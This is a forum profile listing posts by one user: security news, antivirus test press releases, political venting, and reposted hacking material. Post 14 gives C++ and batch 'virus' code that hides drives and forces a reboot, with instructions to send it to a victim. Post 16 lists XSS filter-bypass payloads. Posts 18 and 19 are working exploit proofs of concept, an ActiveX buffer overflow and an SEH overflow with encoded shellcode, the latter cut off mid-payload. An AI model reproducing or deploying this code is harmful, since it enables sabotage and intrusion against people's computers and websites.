Matt

Active Members
  • Posts

    1773
  • Days Won

    6

Everything posted by Matt

  1. Independent testing labs place G Data in the "Advanced +" category for detection and a low number of false positives

     Security software is part of every Internet user's basic kit; otherwise things would be too easy for cybercriminals. Every user must make sure they are protected on the Internet; this requires effective protection recognised by the testing bodies in the field. In the recently published "Real World Protection" test, AV-Comparatives tested 19 of the best-known security solutions. The result: the new G Data InternetSecurity 2014 stood out for its malware detection and was awarded "Advanced +".

     Details of the Whole Product Dynamic Real World Protection test
     Number of Internet security suites tested: 19, including the new G Data InternetSecurity 2014
     Malware samples used: 1,972
     Test period: March to June 2013
     Test organised by AV-Comparatives: http://www.av-comparatives.org/wp-content/uploads/2013/07/avc_prot_2013a_en.pdf

     G Data InternetSecurity 2014 integrates G Data's new trademark, the CloseGap technology, to deliver in real time the best protection against viruses, hacking, spam and other online threats. The active hybrid protection also covers protection against country-specific threats. The firewall works silently in the background and does not slow the computer down. The integrated parental control module protects children and teenagers from sites with inappropriate content. It is quick and easy to set up, runs silently in the background and does not slow the system down.

     NEW: Active hybrid protection through the CloseGap technology, which closes security gaps
     NEW: Autostart Manager speeds up computer start-up
     NEW: Redesigned user interface for intuitive use, no user manual needed
     IMPROVED: New BankGuard technology for secure online shopping and banking
     IMPROVED: Behaviour monitoring for protection against unknown threats
     Parental control for protection against inappropriate content, subscription offers, etc.
     Additional real-time data comparison in the cloud to reduce the number of false positives
     Recommended for gamers: top detection and high performance, without annoying pop-ups
     Low resource consumption thanks to the Fingerprinting, Idle Scan and Active Hybrid Protection technologies
     Protection for Android smartphones and tablets

     Versions and prices available in August:
     G Data InternetSecurity 2014 ESD for 1 PC: recommended price 18€ + VAT
     G Data InternetSecurity 2014 ESD for 3 PCs: recommended price 23€ + VAT

     System requirements
     PCs with Windows 8/7/Vista (32/64 bit) with at least 1 GB RAM, or Windows XP (SP2 or later, 32 bit), 512 MB RAM

     About G DATA Software AG
     G Data Software AG, headquartered in Bochum, is an innovative and rapidly expanding software company that focuses on IT security solutions. As a specialist in Internet security and a pioneer in antivirus protection, the company, founded in 1985 in Bochum, produced the first antivirus program more than 20 years ago and in 2010 celebrated its 25 years of activity. G Data is among the leading security software developers in the world. For more than five years, no other European security software vendor has won more international awards. The product range includes security solutions for home users as well as for small, medium and large companies. G Data security solutions are available in more than 90 countries worldwide. More information about the company and the G Data solutions is available at International - G Data Software AG

     About AV Security Software Distribution
     AV Security Software Distribution is a young company, founded at the beginning of 2011 to become the official distributor of G Data Software in Romania, out of the desire of some young and ambitious professionals to show that they can raise the image of a world-class brand on the Romanian market to the level it has in Germany and in the rest of the world. The partnership offer includes high-quality antivirus software solutions and is aimed at resellers, system integrators and retailers. The benefits offered by the "Made in Germany" solutions developed by G Data are: profitability, performance, increased productivity, ease of use, and the best price-quality ratio on the market. More about the company and the distribution of G Data solutions in Romania can be found on the website AV Security Software Distribution - Distribuitor autorizat G Data Romania

     Source: AV Security Software Distribution - Distribuitor autorizat G Data Romania
  2. The independent IT research company NSS Labs has published the results of a study that determined which is the safest browser for surfing the internet. During this research, the Internet Explorer 10 browser recognised the largest number of suspicious sites compared with the other browsers tested, sending warnings to the user, Tech News notes. Microsoft's browser also tells us extremely quickly whether the site we want to open is dangerous for the safety of our computer.

     The research was carried out between 13 March and 19 April 2013. The effectiveness of the browsers' safety systems was tested using 754 links leading to suspicious pages. The experts tried, at the same time, to access the same suspicious sites, with each tested browser logging 18,000 attempts. The computers ran the Microsoft Windows 8 Enterprise operating system.

     Internet Explorer 10 proved to be the most effective and the safest, detecting 99.96% of the suspicious links. Google Chrome came second with an effectiveness of 83.16%. Apple's Safari and Firefox 19 take third and fourth place respectively, with figures of 10.15% and 9.92%. Opera 12 detects suspicious sites in only 1.87% of cases.

     It turned out that Firefox and Safari block 1 in ten suspicious sites. This means that the other nine have to be stopped by the antivirus installed on the computer. Chrome stops 8 out of 9 accesses, while Explorer 10 misses only 4 sites in 1000. Opera users are practically defenceless, the NSS Labs analysis shows. In all cases, the browsers warn the user that the site they are about to visit may harm the computer, but they cannot block the visitor's access.

     This research is not the only one to establish that Internet Explorer is the safest browser. In September 2012, NSS Labs named all the new versions of the browser as the safest. Internet Explorer also proved to be the lowest energy consumer.

     Source: Ziare.com
  3. Germany has cancelled the data-exchange agreements with the USA, the United Kingdom and France, concluded in 1968, which allowed the special services of these countries to carry out monitoring on German territory, following the espionage scandal over a programme intercepting telephone and internet communications, Russia Today reported, citing Deutsche Welle's Russian-language service. According to the sources cited, the German Foreign Ministry has already sent notifications to this effect to the three states.

     "The termination of the agreements because of the events of recent weeks has become a necessary and appropriate consequence of the disputes over the protection of privacy," explained German Foreign Minister Guido Westerwelle, quoted by the online publication Vzgliad.

     The data-exchange agreements were signed by the parties after Germany adopted, in 1968, the law limiting the secrecy of correspondence and of postal and telephone communications. This is the so-called G10 law. This law allows the security services to check up to 20% of such communications and connections between Germany and other countries. The documents in question additionally allowed the three countries to use data from the Federal Office for the Protection of the Constitution or from the German Federal Intelligence Service (BND).

     At the end of June, German media reported that the US National Security Agency (NSA) intercepts up to 500 million telephone calls and Internet posts. All this information came to public attention after, more than a month ago, former intelligence consultant Edward Snowden disclosed to the British press data about a secret US government programme for global electronic surveillance.

     Source: Business24.ro
  4. Video: Inside Scoop: Wi-Fi routers susceptible to hacking | CNET TV | Video Product Reviews, CNET Podcasts, Tech Shows, Live CNET Video

     The research team that discovered significant security holes in more than a dozen home Wi-Fi routers adds more devices to that list at Defcon 21.

     More major brand-name Wi-Fi router vulnerabilities continue to be discovered, and continue to go unpatched, a security researcher has revealed at Defcon 21. Jake Holcomb, a security researcher at the Baltimore, Md.-based firm Independent Security Evaluators and the lead researcher into Wi-Fi router vulnerabilities, said that problem is worse than when ISE released its original findings in April.

     The latest study continues to show that the small office and home office Wi-Fi routers are "very vulnerable to attack," Holcomb said. "They're not a means to protect your network and your digital assets," he cautioned.

     Holcomb is a relatively young researcher, in his mid-20s, who turned his lifelong interest in computer security into a professional career only in the past year. Previously, he was doing network security for a school district in Ohio.

     The new report details 56 new Common Vulnerabilities and Exposures, or CVEs, that Holcomb and the other ISE researchers have found in popular routers. These include the Asus RT-AC66U, D-Link DIR-865L, and TrendNet TEW-812DRU, for which Holcomb plans on demonstrating vulnerabilities at Defcon on Saturday and Sunday.

     Requests for comment from the affected vendors were not immediately returned. CNET will update this story when we hear from them.

     You might not think that the router security holes could affect you, or would be easy to exploit, but Holcomb explained that because the vulnerabilities appear to affect most routers, and are hard to fix, these could put nearly every person who connects to a vulnerable router at risk.

     The scenario he explained from the noisy hallways of the Rio Convention Center here was a common one. Small-business and home Wi-Fi router administration often employs weak passwords, or static passwords that are the same across multiple stores, like a Starbucks.

     Image caption: The Asus RT-AC66U, one of the routers that has been discovered to have vulnerabilities.

     All an attacker has to do is go to his favorite Seattle-based coffee joint, buy a venti latte and a low-fat pumpkin ginger muffin, and get the establishment's Wi-Fi password. Then, equipped with access to the Wi-Fi network, all that attacker would have to do is use one of the exploits that ISE has uncovered. The router would be compromised, including all the Web traffic flowing through it.

     Holcomb compared the problem of fixing routers to traditional PCs. "In most cases, automatic updates are enabled for Windows and Mac," he said. But, he added, "even if a router manufacturer were to implement a similar feature, most people don't log into their routers." Basically, because people have been trained to think of the router as a set-it-and-forget-it device, and one without security flaws, it's nearly impossible to get them to update router firmware.

     Image caption: The TrendNet TEW-812DRU, another of the routers that has been discovered to have vulnerabilities.

     The fix won't be an easy one, at least not logistically. "I think the solution is for routers to automatically update, and give users the ability to opt out of it," Holcomb said.

     But given the reluctance of some major router manufacturers to address the problems, these exploits could exist unpatched in the wild for years to come. Holcomb said that while TP-Link fixed all the vulnerabilities that ISE reported to it, D-Link has never responded. And Linksys, he said, chose not to repair many of the vulnerabilities reported to it.

     In the case of the Linksys EA-6500, someone can place their own code in the router's configuration file and overwrite it. "It's an attack that relies heavily on social engineering," said Holcomb, "but it's an example of the vendors not resolving a vulnerability. Why [not], I don't know."

     Under the guidelines of responsible disclosure, Holcomb says that ISE notified all router manufacturers of the vulnerabilities discovered before going public with them, giving them a chance to fix them.

     Image caption: The D-Link DIR-865L, also discovered to have vulnerabilities.

     Holcomb will be demonstrating how to take control of three different routers using a different vulnerability in each. For the aforementioned Asus router, he plans to demonstrate a buffer overflow exploit; for the D-Link he plans to use Web-based and symlink directory traversal exploits; and he will attack the TrendNet router using a cross-site scripting forgery and command injection exploit.

     "All three give us a root shell," he said, meaning access to the router's lowest levels of code.

     Source: News.cnet.com
     The story in Romanian: SmartNews.Ro
  5. Reports say user IP addresses revealed, mail down, malware spreading

     Network anonymisation outfit TOR has posted a fascinating piece of commentary on reports that some of the anonymous servers it routes to have disappeared from its network.

     “Around midnight on August 4th we were notified by a few people that a large number of hidden service addresses have disappeared from the Tor Network,” the piece starts. “There are a variety of rumors about a hosting company for hidden services: that it is suddenly offline, has been breached, or attackers have placed a javascript exploit on their web site”.

     As it explores the rumours, the post goes on to name an entity called Freedom Hosting, and to vigorously dissociate TOR from the organisation.

     Distancing TOR from Freedom seems a fine idea given numerous reports, such as this from The Irish Examiner, suggest its founder Eric Eoin Marques has been arrested because the FBI believes he facilitated the distribution of child pornography using TOR. The FBI wants to extradite Marques to the USA.

     TOR's not sure if the arrest and the disappearance of some nodes is linked, but is saying “someone has exploited the software behind Freedom Hosting … in a way that it injects some sort of javascript exploit in the web pages delivered to users.”

     That payload results in malware reaching users' PCs, possibly thanks to “potential bugs in Firefox 17 ESR, on which our Tor Browser is based.” TOR is “investigating these bugs and will fix them if we can”.

     Various forums online, however, report that the malware has spread beyond sites hosted by Freedom. Some suggest TORmail, TOR's secure email service, may also have been compromised, or that the attack means TOR is no longer able to mask users' IP addresses.

     TOR's post says it's not sure what's really happening and that it will update users once it learns more. We'll do likewise. ®

     Source: TheRegister.co.uk
  6. Purpose: Change. They don't turn out to vote.
  7. We complain for nothing. We choose our own leaders. Whether it's Basescu, Ponta or Iliescu, they are all cut from the same cloth. It only depends on the degree of malice they have. We deserve our fate. We executed our leader. We have always voted for those who give the best examples, who only give examples. We have no chance of survival in the next 50+ years, except maybe if we are occupied by another nation. We have a shitty mass media where only gossip and celebrity news are on the front page. No culture news, no (foreign) music news, no literature. The baccalaureate is useless. You pass it however you pass it. The jerks pass the bac with no problem, while some who maybe study more and are worse off fail the bac and end up working the fields, screwed. The TV channels are shit, we don't have 2 decent channels, I have 20 music channels that nobody watches, 10 sports channels with shows about a single team, about shit and more shit. What can we do? Nothing, nobody will take to the streets any more because we are fools and can't even manage to go and return our products when they are broken, let alone take to the streets for a change.
  8. I got the same message from the same user too. Looks like he's been up to no good.
  9. You understand it best in English. It's essential to know English, especially in this field.
  10. Matt

    Fun stuff

  11. A hacker with the handle "Pr3 H4ck3r" from Philippine Cyber Army has claimed to have hacked into the database of the Navy website. According to the hacker's statement, he compromised the data by exploiting the SQL Injection vulnerability in the Navy's "BRP Alcaraz blog" page (navy.mil.ph/alcaraz). However, we are not able to access the given link at the time of writing. It appears the admin has taken down the link. The news was first reported by local hacking news site PinoyHackNews. In a pastebin post (pastebin.com/5xhP6zft), hackers leaked the login credentials compromised from the database. It includes the Admin login credentials. What's worse is that they are using a very weak username and password. They have used the "userpassword" as password. Even if there were no bug, a hacker could have guessed the password or got the password by brute-forcing. It is sad to know that the Navy website itself has poor security and weak passwords. Source: EHackingNews.Com
  12. Simple Machines Forum (SMF), one of the top free open source forum software packages, has revealed that its official website was compromised by intruders on the 20th of July. A hacker compromised one of the admins' account passwords, which allowed him to gain access to the database server that contains the users' data. SMF admitted that user data has been compromised by saying "we are 100% sure that our user database has been stolen". The stolen data includes passwords, personal messages and other info, SMF said on their community page. Users are urged to change their passwords. If you have used the same password anywhere else, it is recommended to change the password there also. According to the SMF report, the attackers got the admin password by hacking into another website where the admin is one of the members. The admin reportedly used the same password on their website also, which helped the attackers to take advantage of it. This is just an example of why you shouldn't use the same password on multiple websites. We are thankful to one of EHN's Greek readers, "IGuru", for informing us about the announcement. Source: EHackingNews.Com
  13. The official website of the National Database and Registration Authority of the Pakistan Government is down after Afghan Cyber Army (ACA) crashed the database server. Trying to access "nadra.gov.pk" will end up in the "connection has time out" error message that confirms the hacker's claim.

      Image caption: NADRA.pk website is down

      "This hack is a response to the rocket attacks of Pakistan military on Kunar and Jalalabad Provinces of Afghanistan!" Speaking to E Hacking News, the hacker stated this as the reason behind the attack. "Next time wait for bigger damage, We will not let any torture and overtaking on our land unanswered. " This is not the first time Afghan hackers have targeted Pakistan Government websites; we are aware of the recent Afghan Cyber Army attack on multiple Pakistan Government websites. The websites were left defaced. Source: EHackingnews.com
  14. Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also. C++ Virus Code : #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h > int main() { ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/ write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; } Copy the above code and paste in notepad Save the file with .cpp extension Compile and create .exe file in cpp Note: Don't run this c++ program ,it will attack your system itself. Copy the created .exe file and send it to your victim. You can also attach it with any other exe files. Batch Virus Code Creation: REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n shutdown -r -c \"Sorry Your System is hacked by us!\" -f I think this code will simple for non c++ programmers. It is easy to create the batch file also. Copy the above code to notepad. Save it with .bat extension (for ex: nodrivevirus.bat) Send the file to your victim. Sursa BreakTheSecurity.Com
  15. So far I have provided a few Web Application Pen Testing tutorials. Now it is time for practicing your hacking / pentesting skills in a legal way. Last time, I explained the Damn Vulnerable Web Application (DVWA). Now, I've come with a different web application that will help you to improve your knowledge in web app pentesting.

      The BodgeIt Store
      Like DVWA, this is also a vulnerable web application that will help you to develop your skills in pen testing. With this vulnerable application, you can practice the following attacks:
        Cross Site Scripting (XSS)
        SQL injection (SQLi)
        Hidden (but unprotected) content
        Cross Site Request Forgery
        Debug code
        Insecure Object References
        Application logic vulnerabilities
      There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not.

      How to set up the Pen Testing Lab?
      Requirements:
        BodgeIt app (download)
        Tomcat server
      Download the bodgeit.1.3.0.zip file and extract the zip file. Now you will get a WAR file (bodgeit.WAR).

      Step 1: Install Tomcat
      Install Tomcat on your system. If you don't know how to install Tomcat, do a Google search.

      Step 2: Start the server
      Start the Tomcat server. In Ubuntu, type the following command in Terminal:
        sudo /etc/init.d/tomcat6 start
      For Windows users, just click the Tomcat server in All Programs.

      Step 3: Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp (http://localhost:8080/manager/html) page. Clicking the link will ask you to enter the username and password. Enter your computer username and password.

      Step 4: Now you are on the "Tomcat Web Application Manager" page. Scroll down and there you can see the "WAR file to deploy" form.

      Step 5: Deploying the WAR
      Click the Browse button and select the bodgeit.WAR file. Now click the Deploy button.

      Yes, now the application is successfully installed. Access BodgeIt at this location: http://localhost:8080/bodgeit/

      Source: BreakTheSecurity.Com
  16. Sometimes website owners use XSS filters (WAF) to protect against XSS vulnerabilities. For example, if you put in <script>alert("hi")</script>, the filter will escape the " (quote) character, so the script will become <script>alert(>xss detected<)</script>. Now this script won't work. Likewise, filters use different types of filtering methods to give protection against XSS. In this case, we can use some tricks to bypass the filter. Here I am going to cover that only.

      1. Bypassing magic_quotes_gpc
      magic_quotes_gpc=ON is a PHP setting (configured in the PHP.ini file); it automatically escapes every ' (single quote), " (double quote) and \ with a backslash. For example, <script>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>, so the script won't work now. This is a well-known filtering method, but we can easily bypass this filter by using ASCII characters instead. For example, alert("hi"); can be converted to
        String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
      so the script will become
        <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
      In this case there is no " (quote) or ' (single quote) or /, so the filter can't filter this thing. Yes, it will successfully run the script. String.fromCharCode() is a JavaScript function that converts ASCII values to characters.

      How to convert to ASCII values?
      There are some online sites that convert to ASCII characters. But I suggest you use the Hackbar Mozilla addon. After installing the Hackbar add-on, press F9. It will open a small box above the URL bar. Click XSS->String.fromCharCode(). Now it will pop up a small window. Enter the code, for instance alert("Hi"), and click the OK button. Now we have got the output. Copy the code inside the <script></script> and insert it in the vulnerable sites. For example:
        hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

      2. HEX Encoding
      We can encode our whole script into HEX code so that it can't be filtered. For example, <script>alert("Hi");</script> can be converted to HEX as:
        %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
      Now put the code in the vulnerable site request. For example:
        hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
      Converting to HEX: this site will convert to hex code: http://centricle.com/tools/ascii-hex/

      3. Bypassing using Obfuscation
      Some website admins put script and alert in a restricted word list, so whenever you input these keywords, the filter will remove them and will give an error message like "you are not allowed to search this". This can be bypassed by changing the case of the keywords (namely obfuscation). For example:
        <ScRipt>ALeRt("hi");</sCRipT>
      This bypass technique rarely works, but it is worth giving it a trial.

      4. Closing Tag
      Sometimes putting "> at the beginning of the code will work:
        "><script>alert("Hi");</script>
      This will end the previously opened tag and open our script tag. Example:
        hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

      Conclusion: From the above article, it is clear that XSS filters alone are not going to protect a site from XSS attacks. If you really want to make your site more secure, then ask pentesters to test your application or test it yourself. Also, there are a lot of different filter bypassing techniques; I just covered some useful techniques for you.

      Source: Breakthesecurity.com
  17. What is DOM?
      DOM is expanded as Document Object Model; it allows client-side scripts (e.g. JavaScript) to dynamically access and modify the content, structure, and style of a webpage. Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM. Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.

        <html>
        <head>
        </head>
        <body>
        <script>
        var pos=document.URL.indexOf("BTSinput=")+9; //finds the position of value
        var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
        document.write(unescape(userInput)); //writes content to the webpage
        </script>
        </body>
        </html>

      If you know HTML and JavaScript, understanding the above code is a piece of cake. In the above example, the JavaScript code gets the value from the URL parameter "BTSinput" and writes the value in our webpage. For example, if the URL is
        www.BreakThesecurity.com/PenTesting?BTSinput=default
      the webpage will display "default" as output. Did you notice?! That part of the webpage is not written by a server-side script. The client-side script modifies the content dynamically based on the input. Everything is done with the help of the DOM object 'document'.

      DOM Based XSS vulnerability:
      When a developer writes the content using a DOM object without sanitizing the user input, it allows an attacker to run his own code. In the above example, we failed to sanitize the input and simply displayed whatever value we get from the URL. An attacker with malicious intention can inject an XSS vector instead. For example:
        www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>
      As I said earlier, the document.write function simply writes the value of the BTSinput parameter in the webpage. So it will write the '<script>alert("BreakTheSec")</script>' in the webpage without sanitizing. This results in running the script code and displays the alert box.

      Patching the DOM Based Cross Site Scripting Vulnerability
      Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:
        The document.write() function
        The document.writeln() function
        The eval() function, which executes JavaScript code from a string
        The execScript() function, which works similarly to eval()
        The setInterval(), setTimeout(), and navigate() functions
        The .innerHTML property of a DOM element
        Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
        The event handler properties like .onClick, which take JavaScript code as their values
      Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.
      You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

      Reference: Vulnerability & Exploit Database | Rapid7
      Source: Breakthesecurity.com
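
The white-list escaping recommended in post 17, as an added example that is not code from either post or from Rapid7: it is run against the BTSinput payloads quoted in posts 16 and 17 and compared with a keyword black list. The helper names, the constructed sample URLs and the case-sensitive word filter are assumptions made for illustration.

```javascript
'use strict';

// Constructed sample URLs; the payloads are the ones quoted in posts 16 and 17.
const BASE = 'http://www.BreakThesecurity.com/PenTesting?BTSinput=';
const SAMPLES = [
  BASE + 'default',
  BASE + '<script>alert("BreakTheSec")</script>',
  BASE + '%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b' +
         '%3c%2f%73%63%72%69%70%74%3e',
  BASE + '<ScRipt>ALeRt("hi");</sCRipT>',
  BASE + '"><script>alert("Hi");</script>',
];

// Same extraction as the page's snippet: everything after "name=" in the URL.
function rawParam(url, name) {
  const marker = name + '=';
  const pos = url.indexOf(marker);
  return pos === -1 ? '' : url.substring(pos + marker.length);
}

// Percent-decode the way the page does before writing; malformed input stays literal.
function decode(raw) {
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw;
  }
}

// White list: ASCII letters and digits pass, every other code point becomes a
// numeric character reference, so no input can open a tag or close an attribute.
function escapeHtml(text) {
  let out = '';
  for (const ch of String(text)) {
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
      continue;
    }
    let cp = ch.codePointAt(0);
    // NUL and lone surrogates are not valid character references.
    if (cp === 0 || (cp >= 0xd800 && cp <= 0xdfff)) cp = 0xfffd;
    out += '&#x' + cp.toString(16).toUpperCase() + ';';
  }
  return out;
}

// Hypothetical black list for comparison: strips two keywords, case-sensitively,
// from the raw request value before the page decodes it.
function blacklistFilter(raw) {
  return raw.replace(/script|alert/g, '');
}

// True when the markup handed to document.write() would still contain a script tag.
function hasScriptTag(html) {
  return /<\s*\/?\s*script/i.test(html);
}

function renderBlacklisted(url) {
  return decode(blacklistFilter(rawParam(url, 'BTSinput')));
}

function renderEscaped(url) {
  return escapeHtml(decode(rawParam(url, 'BTSinput')));
}

// One row per sample: the decoded value and whether each defence leaves a tag.
function audit(urls) {
  return urls.map((url) => ({
    value: decode(rawParam(url, 'BTSinput')),
    blacklistLeavesScript: hasScriptTag(renderBlacklisted(url)),
    escapedLeavesScript: hasScriptTag(renderEscaped(url)),
  }));
}

// In a browser, a text sink avoids building markup at all:
//   element.textContent = decode(rawParam(document.URL, 'BTSinput'));
console.log(JSON.stringify(audit(SAMPLES), null, 2));
```
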
  18. Description : # Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability # Date: 03.8.2013 # Exploit Author: d3b4g # Vendor Homepage:StarUML - The Open Source UML/MDA Platform # Software Link: StarUML - The Open Source UML/MDA Platform # Tested on: Windows XP SP3 Author : d3b4g Source : StarUML WinGraphviz.dll - ActiveX Buffer Overflow Vulnerability Code : About StarUML -------------- StarUML is an open source project to develop fast, flexible, extensible, featureful, and freely-available UML/MDA platform running on Win32 platform. Exception Code: ACCESS_VIOLATION Disasm: D98439 MOV DL,[EBP] (WinGraphviz.DLL) Seh Chain: -------------------------------------------------- 1 6B47D959 VBSCRIPT.dll 2 772FE115 ntdll.dll Called From Returns To -------------------------------------------------- Registers: -------------------------------------------------- EIP 00D98439 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EAX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EBX 0020D70A -> 00000038 ECX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EDX 000003FF EDI 000003FE ESI 00000000 EBP 00000000 ESP 0020D618 -> 00000059 The example code below triggers the vulnerability ------------------------------------------------- <object classid='clsid:1F25D86C-95BC-4E33-A177-EE8DABEF8B04' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\StarUML\WinGraphviz.dll" prototype = "Function ToDot ( ByVal Source As String ) As String" memberName = "ToDot" progid = "WINGRAPHVIZLib.NEATO" argCount = 1 
arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" target.ToDot arg1 </script>
  19. Description : #!/usr/bin/python # ========================================================================================== # Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability (SEH) # Date: 2013-08-03 # Exploit Author: sagi- # Original Bug Found By: ariarat # Vendor Homepage: http://www.mostgear.com # Software Link: Easy LAN Folder Share - Free download and software reviews - CNET Download.com # Version: 3.2.0.100 # Tested On: Windows XP Professional SP2 & SP3 (ENG) # ========================================================================================== # The registration code field in the 'activate license' window is vulnerable to a buffer overflow. # This script generates a malicious registry file. # Once the generated file has been loaded into the registry, execute the application as normal. # ========================================================================================== # Greetz: corelanc0d3r, g0tmi1k # ========================================================================================== Author : sagi- Source : Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Exploit (SEH) Code : header = "Windows Registry Editor Version 5.00\n\n" header += "[HKEY_LOCAL_MACHINE\SOFTWARE\MostGear\EasyLanFolderShare_V1\License]\n" header += "\"BeginDate\"=\"8/2/2013\"\n" header += "\"ExpireDate\"=\"8/17/2013\"\n" header += "\"UserName\"=\"a\"\n" header += "\"Serial\"=\"" junk = "\x41" * 550 nseh = "\xEB\x27\x90\x90" # jmp short 0x29 seh = "\xEF\x03\xFC\x7F" # pop pop ret padding = "\x90" * 33 # Required as some random characters appear on the stack #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_upper -t c #[*] x86/alpha_upper succeeded with size 469 (iteration=1) shellcode = ( "\x89\xe2\xd9\xf6\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" 
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30" "\x43\x30\x53\x30\x35\x30\x4c\x49\x4b\x55\x46\x51\x38\x52\x43" "\x54\x4c\x4b\x30\x52\x56\x50\x4c\x4b\x36\x32\x44\x4c\x4c\x4b" "\x36\x32\x54\x54\x4c\x4b\x33\x42\x47\x58\x54\x4f\x4f\x47\x50" "\x4a\x46\x46\x56\x51\x4b\x4f\x36\x51\x59\x50\x4e\x4c\x37\x4c" "\x55\x31\x43\x4c\x43\x32\x36\x4c\x51\x30\x49\x51\x48\x4f\x34" "\x4d\x43\x31\x48\x47\x4a\x42\x4a\x50\x36\x32\x50\x57\x4c\x4b" "\x50\x52\x44\x50\x4c\x4b\x47\x32\x37\x4c\x43\x31\x48\x50\x4c" "\x4b\x57\x30\x44\x38\x4c\x45\x59\x50\x44\x34\x31\x5a\x53\x31" "\x4e\x30\x50\x50\x4c\x4b\x50\x48\x32\x38\x4c\x4b\x36\x38\x37" "\x50\x55\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x50\x34" "\x4c\x4b\x35\x51\x48\x56\x46\x51\x4b\x4f\x56\x51\x59\x50\x4e" "\x4c\x39\x51\x58\x4f\x44\x4d\x35\x51\x49\x57\x50\x38\x4d\x30" "\x34\x35\x4c\x34\x35\x53\x43\x4d\x4c\x38\x37\x4b\x33\x4d\x46" "\x44\x44\x35\x4a\x42\x51\x48\x4c\x4b\x56\x38\x36\x44\x43\x31" "\x39\x43\x33\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45" "\x4c\x35\x51\x4e\x33\x4c\x4b\x33\x34\x4c\x4b\x55\x51\x4e\x30" "\x4d\x59\x57\x34\x46\x44\x47\x54\x51\x4b\x31\x4b\x53\x51\x46" "\x39\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x31\x48\x51\x4f\x30\x5a" "\x4c\x4b\x32\x32\x4a\x4b\x4c\x46\x51\x4d\x42\x4a\x53\x31\x4c" "\x4d\x4c\x45\x58\x39\x55\x50\x43\x30\x45\x50\x30\x50\x42\x48" 